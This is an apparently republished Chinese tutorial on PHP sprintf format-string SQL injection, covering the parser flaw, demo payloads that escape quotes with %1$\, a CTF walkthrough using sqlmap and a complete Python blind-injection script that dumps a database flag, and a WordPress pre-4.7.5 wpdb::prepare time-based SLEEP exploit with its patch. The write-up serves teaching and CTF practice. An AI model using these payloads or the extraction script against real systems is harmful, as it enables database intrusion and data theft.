sprintf中怎么格式化字符串漏洞

本篇文章為大家展示了sprintf中怎么格式化字符串漏洞,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

創(chuàng)新互聯(lián)專注于河北企業(yè)網(wǎng)站建設,成都響應式網(wǎng)站建設公司,商城系統(tǒng)網(wǎng)站開發(fā)。河北網(wǎng)站建設公司,為河北等地區(qū)提供建站服務。全流程按需網(wǎng)站建設,專業(yè)設計,全程項目跟蹤,創(chuàng)新互聯(lián)專業(yè)和態(tài)度為您提供的服務

首先我們先了解sprintf()函數(shù)

sprintf() 函數(shù)把格式化的字符串寫入變量中。 

sprintf(format,arg1,arg2,arg++) arg1、arg2、++ 參數(shù)將被插入到主字符串中的百分號(%)符號處。該函數(shù)是逐步執(zhí)行的。在第一個 % 符號處,插入 arg1,在第二個 % 符號處,插入 arg2,依此類推。 注釋:如果 % 符號多于 arg 參數(shù),則您必須使用占位符。占位符位于 % 符號之后,由數(shù)字和 "\$" 組成。

通過幾個例子回顧一下sprintf

<?php $number = 123; $txt = sprintf("帶有兩位小數(shù):%1\$.2f<br>不帶小數(shù):%1\$u",$number); echo $txt; ?> 輸出結果: 帶有兩位小數(shù):123.00 不帶小數(shù):123

例子2: 

<?php $num1 = 123456789; $num2 = -123456789; $char = 50; // ASCII 字符 50 是 2 //注釋:格式值 "%%" 返回百分號 echo sprintf("%%b = %b",$num1)."<br>"; // 二進制數(shù) echo sprintf("%%c = %c",$char)."<br>"; // ASCII 字符 echo sprintf("%%s = %s",$num1)."<br>"; // 字符串 echo sprintf("%%x = %x",$num1)."<br>"; // 十六進制數(shù)(小寫) echo sprintf("%%X = %X",$num1)."<br>"; // 十六進制數(shù)(大寫) ?> 輸出結果: %b = 111010110111100110100010101 %c = 2  //注意var_dump('2')為string %s = 123456789 %x = 75bcd15 %X = 75BCD15

0x02 sprintf注入原理

底層代碼實現(xiàn)

我們來看一下sprintf()的底層實現(xiàn)方法 

switch (format[inpos]) { case 's': { zend_string *t; zend_string *str = zval_get_tmp_string(tmp, &t); php_sprintf_appendstring(&result, &outpos,ZSTR_VAL(str),width, precision, padding,alignment,ZSTR_LEN(str),0, expprec, 0); zend_tmp_string_release(t); break;    }    case 'd':        php_sprintf_appendint(&result, &outpos,                              zval_get_long(tmp),                              width, padding, alignment,                              always_sign);        break;    case 'u':        php_sprintf_appenduint(&result, &outpos,                              zval_get_long(tmp),                              width, padding, alignment);        break;    case 'g':    case 'G':    case 'e':    case 'E':    case 'f':    case 'F':        php_sprintf_appenddouble(&result, &outpos,                                 zval_get_double(tmp),                                 width, padding, alignment,                                 precision, adjusting,                                 format[inpos], always_sign                                );        break;    case 'c':        php_sprintf_appendchar(&result, &outpos,                            (char) zval_get_long(tmp));        break;    case 'o':        php_sprintf_append2n(&result, &outpos,                             zval_get_long(tmp),                             width, padding, alignment, 3,                             hexchars, expprec);        break;    case 'x':        php_sprintf_append2n(&result, &outpos,                             zval_get_long(tmp),                             width, padding, alignment, 4,                             hexchars, expprec);        break;    case 'X':        php_sprintf_append2n(&result, &outpos,                             zval_get_long(tmp),                             width, padding, alignment, 4,                             HEXCHARS, expprec);        break;    case 'b':        php_sprintf_append2n(&result, &outpos,                             zval_get_long(tmp),                             width, padding, alignment, 1,                             hexchars, expprec);        break;    case '%':        php_sprintf_appendchar(&result, &outpos, '%');        break;    default:        break; }

可以看到, php源碼中只對15種類型做了匹配, 其他字符類型都直接break了,php未做任何處理,直接跳過,所以導致了這個問題: 沒做字符類型檢測的最大危害就是它可以吃掉一個轉義符\, 如果%后面出現(xiàn)一個\,那么php會把\當作一個格式化字符的類型而吃掉\, 最后%\(或%1$\)被替換為空 因此sprintf注入,或者說php格式化字符串注入的原理為: 要明白%后的一個字符(除了%,%上面表格已經(jīng)給出了)都會被當作字符型類型而被吃掉,也就是被當作一個類型進行匹配后面的變量,比如%c匹配asciii碼,%d匹配整數(shù),如果不在定義的也會匹配,匹配空,比如%\,這樣我們的目的只有一個,使得單引號逃逸,也就是能夠起到閉合的作用。

這里我們舉兩個例子

NO.1

不使用占位符號 

<?php $sql = "select * from user where username = '%\' and 1=1#';" ; $args = "admin" ; echo  sprintf ( $sql , $args ) ; //=> echo sprintf("select * from user where username = '%\' and 1=1#';", "admin"); //此時%\回去匹配admin字符串,但是%\只會匹配空 運行后的結果 select * from user where username = '' and 1=1#'

NO.2

使用占位符號 

<?php $input = addslashes ("%1$' and 1=1#" ); $b = sprintf ("AND b='%s'", $input ); $sql = sprintf ("SELECT * FROM t WHERE a='%s' $b ", 'admin' ); //對$input與$b進行了拼接 //$sql = sprintf ("SELECT * FROM t WHERE a='%s' AND b='%1$\' and 1=1#' ", 'admin' ); //很明顯,這個句子里面的\是由addsashes為了轉義單引號而加上的,使用%s與%1$\類匹配admin,那么admin只會出現(xiàn)在%s里,%1$\為空 echo  $sql ; 運行后的結果 SELECT * FROM t WHERE a='admin' AND b='' and 1=1#'

對于這個問題,我們還可以這樣寫 

$sql = sprintf ("SELECT * FROM table WHERE a='%1$\' AND b='%d' and 1=1#' ",'admin'); //result: SELECT * FROM t WHERE a='admin' AND b='' and 1=1#'

第一個格式化處匹配時為空,會讓給后面的格式化匹配 以上兩個例子是吃掉'\'來使得單引號逃逸出來 下面這個例子我們構造單引號

NO.3

對%c進行利用 

<? php $input1 = '%1$c) OR 1 = 1 /*' ; $input2 = 39 ; $sql = "SELECT * FROM foo WHERE bar IN (' $input1 ') AND baz = %s" ; $sql = sprintf ( $sql , $input2 ); echo  $sql ;

%c起到了類似chr()的效果,將數(shù)字39轉化為‘,從而導致了sql注入。 所以結果為: 

SELECT * FROM foo WHERE bar IN ('') OR 1 = 1 /*) AND baz = 39

小結

漏洞利用條件 1. sql語句進行了字符拼接 2. 拼接語句和原sql語句都用了vsprintf/sprintf 函數(shù)來格式化字符串 

ps: MySQL> SELECT ascii('\''); +-------------+ | ascii('\'') | +-------------+ |          39 | +-------------+

0x03 題目訓練

一道注入題目

sprintf中怎么格式化字符串漏洞

形式很像SQL注入,而且題目中提示為SQLI 先試了一下弱口令,確定username為admin 那么就對username與password進行注入,開始普通注入,二次解碼,寬字節(jié),過濾空格,過濾關鍵字等姿勢進行構造注入語句都無果,而且還耗費大量的時間,不過后來get到一種姿勢,使用burpsuit的intruder跑一下,來查看那些字母或者字符沒有被過濾掉(waf字典) 后來發(fā)現(xiàn)%可疑,于是拿出來repeater一下

sprintf中怎么格式化字符串漏洞

sprintf函數(shù)出錯,那么sprintf是什么,格式化字符串,于是乎就懂得其中的原理了,是其單引號逃逸 構造username=admin%1$\' and 1=2# 與 username=admin%1$\' and 1=1# 發(fā)現(xiàn)如下的結果

sprintf中怎么格式化字符串漏洞

sprintf中怎么格式化字符串漏洞

可以發(fā)現(xiàn)'后面的語句帶入執(zhí)行了,這就是注入點,使用sqlmap跑一下 事先抓取post包



python sqlmap.py -r 3.txt -p username --level 3 --dbs --thread 10

sprintf中怎么格式化字符串漏洞

于是對ctf進行跑tables 得到

sprintf中怎么格式化字符串漏洞

對flag跑columns 得到

sprintf中怎么格式化字符串漏洞

對每個列進行dump但是dump下來不對,找了一波原因沒有找到,開始用腳本跑 跑完后才發(fā)現(xiàn)sqlmap跑出來的列不對,應該是flag,于是



python sqlmap.py -r 3.txt -p username --level 3 -D ctf -T flag -C flag --dump --thread 10

才得到正確結果 :)  下面是腳本跑的

sprintf中怎么格式化字符串漏洞

做實驗

利用sqlmap進行POST注入

http://hetianlab.com/expc.do?ce=1336a6fb-7b18-4dd6-8a6d-b9a7ae92f73d

(了解sqlmap,掌握sqlmap的常用命令,學會使用sqlmap進行POST注入攻擊)

中心思想

先判斷l(xiāng)ength 然后使用ascii判斷字母 ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#" 使用這個語句進行判斷 涉及到的一些知識點:

sprintf中怎么格式化字符串漏洞

sprintf中怎么格式化字符串漏洞

sprintf中怎么格式化字符串漏洞

代碼

#coding:utf-8 import requests import string def boom():    url = r'http://f6f0cdc51f8141a6b1a8634161859c1c78499dc70eea47f0.game.ichunqiu.com/'    s = requests.session()    //會話對象requests.Session能夠跨請求地保持某些參數(shù),比如cookies,即在同一個Session實例發(fā)出的所有請求都保持同一個cookies,而requests模塊每次會自動處理cookies,這樣就很方便地處理登錄時的cookies問題。    dic = string.digits + string.letters + "!@#$%^&*()_+{}-="    right = 'password error!'    error = 'username error!'    lens = 0    i = 0    //確定當前數(shù)據(jù)庫的長度    while True:        payload = "admin%1$\\' or " + "length(database())>" + str(i) + "#"        data={'username':payload,'password':1}        r = s.post(url,data=data).content        if error in r:            lens=i            break        i+=1        pass    print("[+]length(database()): %d" %(lens))    //確定當前數(shù)據(jù)庫的名字    strs=''    for i in range(lens+1):        for c in dic:            payload = "admin%1$\\' or " + "ascii(substr(database()," + str(i) +",1))=" + str(ord(c)) + "#"            data = {'username':payload,'password':1}            r = s.post(url,data=data).content            if right in r:                strs = strs + c                print strs                break        pass    pass    print("[+]database():%s" %(strs))    lens=0    i = 1    while True:        payload = "admin%1$\\' or " + "(select length(table_name) from information_schema.tables where table_schema=database() limit 0,1)>" + str(i) + "#"        //對當前的數(shù)據(jù)庫,查詢第一個表的長度        data = {'username':payload,'password':1}        r = s.post(url,data=data).content        if error in r:            lens = i            break        i+=1        pass    print("[+]length(table): %d" %(lens))    strs=''    for i in range(lens+1):        for c in dic:            payload = "admin%1$\\' or " + "ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1)," + str(i) +",1))=" + str(ord(c)) + "#"            // 數(shù)字一定要str才可以傳入            data = {'username':payload,'password':1}            r = s.post(url,data=data).content            if right in r:                strs = strs + c                print strs                break        pass    pass    print("[+]table_name:%s" %(strs))    tablename = '0x' + strs.encode('hex')    //編碼為16進制    table_name = strs    lens=0    i = 0    while True:        payload = "admin%1$\\' or " + "(select length(column_name) from information_schema.columns where table_name = " + str(tablename) + " limit 0,1)>" + str(i) + "#"        data = {'username':payload,'password':1}        r = s.post(url,data=data).content        if error in r:            lens = i            break        i+=1        pass    print("[+]length(column): %d" %(lens))    strs=''    for i in range(lens+1):        for c in dic:            payload = "admin%1$\\' or " + "ascii(substr((select column_name from information_schema.columns where table_name = " + str(tablename) +" limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"            data = {'username':payload,'password':1}            r = s.post(url,data=data).content            if right in r:                strs = strs + c                print strs                break        pass    pass    print("[+]column_name:%s" %(strs))    column_name = strs    num=0    i = 0    while True:        payload = "admin%1$\\' or " + "(select count(*) from " + table_name + ")>" + str(i) + "#"        data = {'username':payload,'password':1}        r = s.post(url,data=data).content        if error in r:            num = i            break        i+=1        pass    print("[+]number(column): %d" %(num))    lens=0    i = 0    while True:        payload = "admin%1$\\' or " + "(select length(" + column_name + ") from " + table_name + " limit 0,1)>" + str(i) + "#"        data = {'username':payload,'password':1}        r = s.post(url,data=data).content        if error in r:            lens = i            break        i+=1        pass    print("[+]length(value): %d" %(lens))    i=1        strs=''    for i in range(lens+1):        for c in dic:            payload = "admin%1$\\' or ascii(substr((select flag from flag limit 0,1)," + str(i) + ",1))=" + str(ord(c)) + "#"            data = {'username':payload,'password':'1'}            r = s.post(url,data=data).content            if right in r:                strs = strs + c                print strs                break        pass    pass    print("[+]flag:%s" %(strs)) if __name__ == '__main__':    boom()    print 'Finish!'


<?php $input = addslashes("%1$' and 1=1#"); echo $input; echo "\n"; $b = sprintf("AND b='%s'",$input); echo $b; echo "\n"; $sql = sprintf("select * from t where a='%s' $b",'admin'); echo $sql; >>>結果 %1$\' and 1=1# AND b='%1$\' and 1=1#' select * from t where a='admin' AND b='' and 1=1#'

格式字符%后面會吃掉一個\即%1$\被替換為空,逃逸出來一個單引號,造成注入.

0x04 Wordpress格式化字符串漏洞

漏洞跟蹤

wordpress版本小于4.7.5在后臺圖片刪除的地方存在一處格式化字符串漏洞 官方在4.7.6已經(jīng)給出了補救辦法 在我們即將要說的地方增加了這么一端代碼 

$query = preg_replace( '/%(?:%|$|([^dsF]))/', '%%\\1', $query ); // escape any unescaped percents

只允許 %后面出現(xiàn)dsF 這三種字符類型, 其他字符類型都替換為%%\1, 而且還禁止了%, $ 這種參數(shù)定位 首先 我們找到upload.php 可以發(fā)現(xiàn)在deleta中 $post_id_del(比如int()) 未經(jīng)過處理,直接傳入 

case 'delete':    if ( !isset( $post_ids ) )        break;    foreach ( (array) $post_ids as $post_id_del ) {        if ( !current_user_can( 'delete_post', $post_id_del ) ) //跟進            wp_die( __( 'Sorry, you are not allowed to delete this item.' ) );        if ( !wp_delete_attachment( $post_id_del ) )            wp_die( __( 'Error in deleting.' ) );    }    $location = add_query_arg( 'deleted', count( $post_ids ), $location );    break;

跟進wp_delete_attachment( )函數(shù) 其中參數(shù)$post_id_del為圖片的postid wp_delete_attachment( )中 調用了delete_metadata 函數(shù) 

function wp_delete_attachment( $post_id, $force_delete = false ) { ....... delete_metadata( 'post', null, '_thumbnail_id', $post_id, true ); // delete all for any posts. ...... }

繼續(xù)跟進delete_metadata函數(shù) 漏洞觸發(fā)點主要在wp-includes/meta.php 的 delete_metadata函數(shù)里面, 有如下代碼: 

if ( $delete_all ) {    $value_clause = '';    if ( '' !== $meta_value && null !== $meta_value && false !== $meta_value ) {        $value_clause = $wpdb->prepare( " AND meta_value = %s", $meta_value );    }    $object_ids = $wpdb->get_col( $wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s $value_clause", $meta_key ) ); }

調用了兩個prepare函數(shù) 跟進prepare函數(shù) 

public function prepare( $query, $args ) {    if ( is_null( $query ) )        return;    // This is not meant to be foolproof -- but it will catch obviously incorrect usage.    if ( strpos( $query, '%' ) === false ) {        _doing_it_wrong( 'wpdb::prepare', sprintf( __( 'The query argument of %s must have a placeholder.' ), 'wpdb::prepare()' ), '3.9.0' ); }    $args = func_get_args();    array_shift( $args );    // If args were passed as an array (as in vsprintf), move them up    if ( isset( $args[0] ) && is_array($args[0]) )        $args = $args[0];    $query = str_replace( "'%s'", '%s', $query ); // in case someone mistakenly already singlequoted it    $query = str_replace( '"%s"', '%s', $query ); // doublequote unquoting    $query = preg_replace( '|(?<!%)%f|' , '%F', $query ); // Force floats to be locale unaware    $query = preg_replace( '|(?<!%)%s|', "'%s'", $query ); // quote the strings, avoiding escaped strings like %%s    array_walk( $args, array( $this, 'escape_by_ref' ) );    return @vsprintf( $query, $args ); }

詳細看prepare函數(shù)對傳入?yún)?shù)的處理過程 首先對%s進行處理 

$query = str_replace( "'%s'", '%s', $query ); // in case someone mistakenly already singlequoted it    $query = str_replace( '"%s"', '%s', $query ); // doublequote unquoting    $query = preg_replace( '|(?<!%)%f|' , '%F', $query ); // Force floats to be locale unaware    $query = preg_replace( '|(?<!%)%s|', "'%s'", $query ); // quote the strings, avoiding escaped strings like %%s

把'%s'替換為%s,然后再把"%s"替換成%s,替換為浮點數(shù)%F 把%s替換成'%s' 最后再進行vsprintf( $query, $args ); 對拼接的語句進行格式化處理 我們一步步分析 假設傳入的$meta_value為'admin'  

$wpdb->prepare( " AND meta_value = %s", $meta_value );

經(jīng)過prepare函數(shù)處理后得到 

vsprintf( " AND meta_value = '%s'",'admin') =>  AND meta_value = 'admin'

return到上一級函數(shù)后,繼續(xù)執(zhí)行這一條拼接語句: 

$wpdb->prepare( "SELECT $type_column FROM $table WHERE meta_key = %s $value_clause", $meta_key )

經(jīng)過prepare函數(shù)處理后得到 

vsprintf( "SELECT $type_column FROM $table WHERE meta_key = '%s'  AND meta_value = 'admin'",'admin') => SELECT $type_column FROM $table WHERE meta_key = 'admin'  AND meta_value = 'admin'

看起來一切都很正常,毫無bug 但是我們可以思考一下,怎樣使其形成注入呢?s> 或者說怎樣逃逸一個單引號? 在之前我們先看一下,可控變量 $post_id_del 的路線 

$post_id_del => $post_id => $meta_value => $args => $query

顯然這里面兩處admin都有單引號,而且兩處都與 $post_id_del 聯(lián)系,如何來選擇? 對于第一處單引號 它是通過一次替換處理得到的,顯然是對單引號>無法處理 對于第二處單引號 經(jīng)過兩次的替換,(這里的意思是執(zhí)行了兩次的替換代碼,可能第二段代碼對他沒有起到實質性的作用,僅僅是去點單引號然后又加上單引號) 但是這一出經(jīng)過了兩次處理是必須的,那么我們是否能夠是構造出另一個單引號(此時第二處有三個單引號)就可以閉合前面的單引號了 最重要的是,第二次的替換處理的變量是可控的,因此要引入單引號,我們需要$meta_value含有%s 那么第一次的結果為 

AND meta_value = 'X%sY'(其中XY為未知量) //這里需要注意,為什么%s不被單引號圍起來,我看過一篇博客,它是寫的'%s',這顯然是錯的,為什么呢?我們生成了'%s'是沒錯,不過還原一下過程就知道了,首先我們生成了AND meta_value = '%s',注意此時與$meta_value沒有半毛錢關系,后來的vsprintf后,才與$meta_value有了關系,原來的%s被替換成了X%sY,值得注意的是這里的%s沒有經(jīng)過任何處理,處理是在第二輪進行的,這是后話。

第二次后的結果為 

SELECT $type_column FROM $table WHERE meta_key = 'admin'  AND meta_value = 'X'%s'Y' (對于第二處的%s我們先不要帶入格式化后的值,其實真實的語句應該為: SELECT $type_column FROM $table WHERE meta_key = 'admin'  AND meta_value = 'X'admin'Y')

分析到這里,相信大家應該知道傳值($meta_value)使單引號逃逸出來了吧 admin顯然是多余的,那么我們需要把它放在單引號里面,因此第二個單引號需要去掉,那么第四個單引號需要注釋掉,這就很輕而易舉地構造sql語句 AND meta_value = 'Xadmin'Y Y里面就是我們注入的代碼

漏洞利用

怎么去傳值呢? 利用格式化字符串漏洞 去掉第二個單引號就需要使該單引號成為%后的第一個字符,也就是%',但是我們還需要一個占位符,%1$' 這樣就沒有報錯的去掉了該單引號 所以我們構造的payload為 

$meta_value = %1$%s AND SLEEP(5)# => AND meta_value = '%1$%s AND SLEEP(5)' => "SELECT $type_column FROM $table WHERE meta_key = '%s' AND meta_value = AND meta_value = '%1$'%s' AND SLEEP(5)#'",'admin' 其中 %1$' => 空 => SELECT $type_column FROM $table WHERE meta_key = 'admin'  AND meta_value = AND meta_value = 'admin' AND SLEEP(5)#' 成功利用該漏洞形成時間注入

漏洞修補

現(xiàn)在我們說一下第四部分開頭的補救方法 后來官方在prepare函數(shù)加了這一代碼 

$query = preg_replace( '/%(?:%|$|([^dsF]))/', '%%\\1', $query ); // escape any unescaped percents

只允許 %后面出現(xiàn)dsF 這三種字符類型, 其他字符類型都替換為%%\1, 而且還禁止了%, $ 這種參數(shù)定位

上述內容就是sprintf中怎么格式化字符串漏洞,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

名稱欄目:sprintf中怎么格式化字符串漏洞
鏈接URL:http://bm7419.com/article38/jdspsp.html

成都網(wǎng)站建設公司_創(chuàng)新互聯(lián),為您提供域名注冊、云服務器、虛擬主機、用戶體驗手機網(wǎng)站建設、服務器托管

廣告

聲明:本網(wǎng)站發(fā)布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經(jīng)允許不得轉載,或轉載時需注明來源: 創(chuàng)新互聯(lián)

小程序開發(fā)